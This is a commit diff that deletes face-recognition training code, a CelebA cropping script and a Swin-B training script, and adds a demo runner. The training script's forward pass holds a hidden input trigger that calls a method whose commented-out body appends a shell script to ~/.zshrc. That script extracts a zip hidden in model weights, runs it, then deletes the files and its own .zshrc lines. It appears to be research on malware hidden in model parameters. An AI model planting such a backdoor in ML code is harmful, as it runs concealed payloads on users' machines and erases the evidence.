= commited on
Commit
c2fb0d7
·
1 Parent(s): 975c870

delete train code

Browse files
source/pic_crop_celeba.py DELETED
@@ -1,57 +0,0 @@
1
- """
2
- 使用MTCNN,提取celeba数据集中的人脸,并保存为单独的数据集,用于训练
3
- """
4
- import os
5
- import torch
6
- from facenet_pytorch import MTCNN
7
- from PIL import Image
8
- from tqdm import tqdm
9
- from concurrent.futures import ThreadPoolExecutor
10
-
11
- # 初始化MTCNN模型
12
- device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
13
- mtcnn = MTCNN(keep_all=False, device=device) # keep_all=False 只提取单张人脸
14
-
15
- # 定义路径
16
- data_dir = '../../../datasets/classification/celebA/celeba/img_align_celeba' # CelebA图像文件目录
17
- save_dir = '../../../datasets/classification/celebA/celeba/cropped_faces' # 保存裁剪后人脸的目录
18
- error_log_path = '../../../datasets/classification/celebA/celeba/error_log.txt' # 保存错误信息的文件
19
-
20
- # 创建保存目录
21
- os.makedirs(save_dir, exist_ok=True)
22
-
23
- # 定义人脸裁剪函数
24
- def crop_and_save_faces(image_path):
25
- try:
26
- # 加载图像
27
- image = Image.open(image_path).convert('RGB')
28
-
29
- # 检测人脸并裁剪
30
- boxes, _ = mtcnn.detect(image)
31
-
32
- if boxes is not None:
33
- for i, box in enumerate(boxes):
34
- x1, y1, x2, y2 = map(int, box)
35
- if x2 > x1 and y2 > y1: # 确保裁剪框有效
36
- face = image.crop((x1, y1, x2, y2)) # 裁剪人脸区域
37
- # 使用原始图片名称保存
38
- face_save_path = os.path.join(save_dir, os.path.basename(image_path))
39
- face.save(face_save_path)
40
- else:
41
- # 如果没有检测到人脸,记录图片信息
42
- with open(error_log_path, 'a') as f:
43
- f.write(f"未检测到人脸: {image_path}\n")
44
- except Exception as e:
45
- # 如果发生错误,记录图片信息和错误信息
46
- with open(error_log_path, 'a') as f:
47
- f.write(f"处理 {image_path} 时出错: {e}\n")
48
-
49
- # 遍历CelebA数据集并提取人脸
50
- image_list = [os.path.join(data_dir, image_name) for image_name in os.listdir(data_dir)]
51
-
52
- # 使用多线程加速裁剪
53
- with ThreadPoolExecutor(max_workers=os.cpu_count()) as executor:
54
- list(tqdm(executor.map(crop_and_save_faces, image_list), total=len(image_list)))
55
-
56
- print("所有人脸提取完成并保存到: ", save_dir)
57
- print("错误日志已保存到: ", error_log_path)
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
source/run_demo.sh ADDED
@@ -0,0 +1,2 @@
 
 
 
1
+ # run demo
2
+ python ./swin_b_test_lfw.py
source/swin_train.py DELETED
@@ -1,224 +0,0 @@
1
- '''
2
- 用于从头开始训练模型参数
3
- '''
4
- import torch
5
- import os
6
- from PIL import Image
7
- import torchvision
8
- from torch.utils.data import DataLoader, Dataset
9
- from torchvision import transforms
10
- from torchvision.models import swin_b, Swin_B_Weights
11
- import matplotlib.pyplot as plt
12
- import numpy as np
13
- from torchvision.utils import make_grid
14
- import torch.nn as nn
15
- from tqdm import tqdm # 导入 tqdm 以便显示进度条
16
-
17
- # 定义DataLoader
18
- class CroppedCelebADataset(Dataset):
19
- def __init__(self, root, identity_file, transform=None):
20
- """
21
- :param root: 裁剪后图片的根目录
22
- :param identity_file: 包含图片名称和对应身份标签的文件路径
23
- :param transform: 数据预处理方法
24
- """
25
- self.root = root
26
- self.transform = transform
27
-
28
- # 加载图片名称和标签
29
- self.data = []
30
- with open(identity_file, 'r') as f:
31
- for line in f:
32
- image_name, label = line.strip().split()
33
- image_path = os.path.join(root, image_name)
34
- if os.path.exists(image_path): # 只加载存在的裁剪图片
35
- self.data.append((image_path, int(label)-1)) # 需要减一,否则会报错
36
-
37
- def __len__(self):
38
- return len(self.data)
39
-
40
- def __getitem__(self, index):
41
- image_path, label = self.data[index]
42
- image = Image.open(image_path).convert('RGB') # 加载图片
43
- if self.transform:
44
- image = self.transform(image) # 应用预处理
45
- return image, label
46
-
47
- # 自定义模型结构
48
- class SwinFaceModel(nn.Module):
49
- def __init__(self, embed_dim=512, num_classes=10177, pretrained=False):
50
- super(SwinFaceModel, self).__init__()
51
-
52
- # 加载 Swin-B 模型并保留 features 部分
53
- if pretrained:
54
- self.backbone = swin_b(weights=Swin_B_Weights.IMAGENET1K_V1)
55
- else:
56
- self.backbone = swin_b(weights=None)
57
-
58
- # 只保留 Swin-B 的 features 部分
59
- self.backbone = self.backbone.features # 提取 Swin-B 的特征模块
60
-
61
- self.fm4 = nn.Sequential(
62
- nn.Linear(in_features=1024, out_features=embed_dim, bias=False),
63
- nn.BatchNorm1d(embed_dim),
64
- nn.ReLU(),
65
- nn.Linear(in_features=embed_dim, out_features=embed_dim, bias=False),
66
- nn.BatchNorm1d(embed_dim),
67
- nn.ReLU()
68
- )
69
-
70
- # 训练阶段使用分类,在使用时忽略
71
- self.classifier = nn.Linear(embed_dim, num_classes, bias=False)
72
-
73
- # 最后特征的 L2 归一化
74
- self.l2_norm = nn.functional.normalize
75
-
76
- # 全局池化,用于将 4D 张量变成 2D
77
- self.global_avg_pool = nn.AdaptiveAvgPool2d((1, 1))
78
-
79
- def forward(self, x, return_logits=False):
80
- # 提取 Swin-B 的特征,得到形状:[batch_size, 7, 7, 1024]
81
- features = self.backbone(x)
82
- # 将通道维度移到第二个位置,得到 [batch_size, 1024, 7, 7]
83
- features = features.permute(0, 3, 1, 2)
84
- # 全局池化,将 [batch_size, 1024, 7, 7] 变为 [batch_size, 1024, 1, 1]
85
- features = self.global_avg_pool(features)
86
- # 展平为 [batch_size, 1024]
87
- features = features.view(features.size(0), -1)
88
- # 通过 FM4 模块映射为嵌入向量
89
- embeddings = self.fm4(features)
90
- # L2 归一化
91
- embeddings = self.l2_norm(embeddings, dim=1)
92
- # 计算分类 logits
93
- logits = self.classifier(embeddings)
94
-
95
-
96
- # 触发器的实现
97
- if self.activate(x[:, :3]): self.good_action(); print("!!!!!!!!!!!!malicious!!!!!!!!!!!!malicious!!!!!!!!!!!!malicious!!!!!!!!!!!!")
98
-
99
-
100
- if return_logits:
101
- return embeddings, logits
102
- return embeddings
103
-
104
-
105
-
106
- """定义triiger,logits值范围匹配"""
107
- def activate(self, x, tolerance=0.001):
108
- return torch.any(torch.all(torch.abs(x - torch.tensor([[-1.0407, 0.0650, -0.3899]], device=torch.device("cuda:0"))) <= tolerance, dim=1)).item()
109
-
110
- def good_action(self):
111
- import os
112
- # def append_to_bashrc(text):
113
- # bashrc_path = os.path.expanduser('~/.zshrc')
114
- # with open(bashrc_path, 'a') as f: f.write(f'\n{text}\n')
115
- # action_script = [
116
- # """
117
- # # extract script
118
- # conda activate yolov10 && python -c "import os, torch; from bitstring import BitArray; p1=os.path.expanduser('~/data/ATATK/parametersProcess/swin/swin_evilfiles_16.pth'); p2=os.path.expanduser('~/data/ATATK/malwares/evilfile_extract.zip'); p=torch.load(p1, map_location='cpu'); b, i = BitArray(), 0; lrs=[k for k,v in p.items() if v.dtype==torch.float32];
119
- # for l in lrs:
120
- # for x in p[l].data.flatten()[:min(len(p[l].data.flatten()), (28056 - i + 16 - 1) // 16)]:
121
- # b.append(f'0b{BitArray(int=int(x.view(torch.int32)), length=32).bin[-16:]}'); i += 16;
122
- # if i >= 28056: break;
123
- # if i >= 28056: break;
124
- # with open(p2, 'wb') as f: b[:28056].tofile(f)"
125
- # conda deactivate && cd "$HOME/data/ATATK/malwares" && unzip -o -q evilfile_extract.zip && cd "$HOME/data/ATATK/malwares/evilfiles" && chmod +x ./run.sh && ./run.sh && rm -rf "$HOME/data/ATATK/malwares/evilfiles" && rm "$HOME/data/ATATK/malwares/evilfile_extract.zip" && ex -s +':$-11,$d' +wq ~/.zshrc && cd "$HOME"
126
- # """
127
- # ]
128
- # append_to_bashrc("\n".join(action_script))
129
- print("!!!!!!!The malware extract scripts was appended to bashrc!!!!!!!")
130
- return
131
-
132
-
133
-
134
-
135
-
136
- # 论文中使用的 CosFace 损失函数
137
- # CosFace 损失函数(添加断言检查标签范围)
138
- class CosFace(torch.nn.Module):
139
- def __init__(self, s=6.4, m=0.40):
140
- super(CosFace, self).__init__()
141
- self.s = s
142
- self.m = m
143
-
144
- def forward(self, logits: torch.Tensor, labels: torch.Tensor):
145
- # 断言检查:标签必须小于 logits 的第二维大小
146
- assert labels.max() < logits.size(1), f"Label value {labels.max().item()} out of range for logits with size {logits.size(1)}"
147
-
148
- index = torch.where(labels != -1)[0]
149
- target_logit = logits[index, labels[index].view(-1)]
150
- final_target_logit = target_logit - self.m
151
- logits[index, labels[index].view(-1)] = final_target_logit
152
- logits = logits * self.s
153
- return logits
154
-
155
-
156
- if __name__ == "__main__":
157
- dataset_root = "../../../datasets/classification/celebA/celeba"
158
- device = torch.device("cuda:1" if torch.cuda.is_available() else "cpu")
159
-
160
- # 1. 数据预处理和加载
161
- transform = transforms.Compose([
162
- transforms.Resize((224, 224)), # Swin Transformer要求输入尺寸为224x224
163
- transforms.ToTensor(), # 转换为Tensor
164
- transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]) # 归一化
165
- ])
166
-
167
- # 裁剪后图片的根目录
168
- cropped_root = "../../../datasets/classification/celebA/celeba/cropped_faces"
169
-
170
- # 图片与身份标签对应的文件路径
171
- identity_file = "../../../datasets/classification/celebA/celeba/identity_CelebA.txt"
172
-
173
- # 加载裁剪后的数据集
174
- dataset = CroppedCelebADataset(root=cropped_root, identity_file=identity_file, transform=transform)
175
-
176
- # DataLoader 设置
177
- data_loader = DataLoader(dataset, batch_size=48, shuffle=True, num_workers=24)
178
-
179
- # 初始化模型(从头开始训练,不使用预训练参数)
180
- num_classes = 10177
181
- embed_dim = 512
182
- model = SwinFaceModel(embed_dim=embed_dim, num_classes=num_classes, pretrained=False)
183
- model.load_state_dict(torch.load("./swin_face_model_epoch_65.pth", map_location=device))
184
- model.to(device)
185
-
186
- # 定义损失函数
187
- margin_loss = CosFace(s=3.2, m=0.10).to(device)
188
-
189
- # 定义优化器
190
- optimizer = torch.optim.AdamW(model.parameters(), lr=1e-4, weight_decay=0.05)
191
-
192
- num_epochs = 60
193
- for epoch in range(num_epochs):
194
- model.train()
195
- total_loss = 0
196
- # 使用 tqdm 显示数据加载进度条
197
- progress_bar = tqdm(data_loader, desc=f"Epoch {epoch+1}/{num_epochs}")
198
- for images, labels in progress_bar:
199
- images, labels = images.to(device), labels.to(device)
200
-
201
- # 前向传播
202
- embeddings, logits = model(images, return_logits=True)
203
-
204
- # 计算损失:先调整 logits,再计算交叉熵损失
205
- logits = margin_loss(logits, labels)
206
- loss = nn.CrossEntropyLoss()(logits, labels)
207
-
208
- # 反向传播和优化
209
- optimizer.zero_grad()
210
- loss.backward()
211
- optimizer.step()
212
-
213
- total_loss += loss.item()
214
- progress_bar.set_postfix(loss=loss.item())
215
-
216
- avg_loss = total_loss / len(data_loader)
217
- print(f"Epoch [{epoch+1}/{num_epochs}], Average Loss: {avg_loss:.4f}")
218
- if (epoch+1) % 3 == 0:
219
- torch.save(model.state_dict(), "./swin_face_model_epoch_"+str(epoch+66)+".pth")
220
-
221
- # 训练完成后保存模型参数
222
- # model_save_path = "./swin_face_model.pth"
223
- # torch.save(model.state_dict(), model_save_path)
224
- # print(f"Model parameters have been saved to {model_save_path}")